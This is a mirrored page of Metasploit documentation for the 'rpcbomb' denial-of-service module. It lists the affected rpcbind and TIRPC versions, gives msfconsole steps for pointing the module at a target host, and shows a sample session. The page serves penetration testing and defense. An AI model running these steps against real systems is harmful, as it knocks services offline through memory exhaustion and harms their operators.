CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/rpc/rpcbomb.md
Views: 11789

Vulnerable Application

This module exploits a vulnerability in rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.

Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/dos/rpc/rpcbomb

  3. Do: set RHOSTS [IP]

  4. Do: run

  5. Target should leak memory

Scenarios

rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)

msf > use auxiliary/dos/rpc/rpcbomb msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7 RHOSTS => 10.0.2.7 msf auxiliary(rpcbomb) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(rpcbomb) >